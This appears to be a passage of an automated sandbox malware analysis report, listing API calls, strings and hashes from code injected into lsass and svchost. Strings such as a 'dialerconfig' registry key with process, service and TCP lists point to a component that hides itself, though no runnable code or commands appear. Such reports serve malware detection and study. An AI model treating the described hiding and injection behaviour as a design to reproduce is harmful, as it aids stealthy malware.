                                                                                • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                                  • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                                • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000195DD5C1ADD
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                                • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
